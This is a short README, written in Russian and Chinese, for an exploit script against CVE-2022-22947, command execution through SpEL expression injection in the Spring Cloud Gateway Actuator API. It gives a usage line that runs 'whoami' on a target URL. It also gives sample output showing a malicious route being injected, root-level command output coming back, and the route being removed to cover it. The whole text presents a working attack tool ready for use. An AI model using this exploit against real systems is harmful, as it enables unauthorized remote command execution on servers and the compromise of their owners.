
Spring Cloud Gateway Actuator API инъекция выражений SpEL выполнение команд Exp
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行Exp
Use:python3 CVE-2022-22947.py -u "http://127.0.0.1:8080" -c "whoami" Result: Добавление вредоносного маршрута SpEL-выражения успешно! Обновление маршрутов успешно! Получение результата атаки успешно:
================================================ root
================================================ Вредоносный маршрут удален! Обновление маршрутов успешно!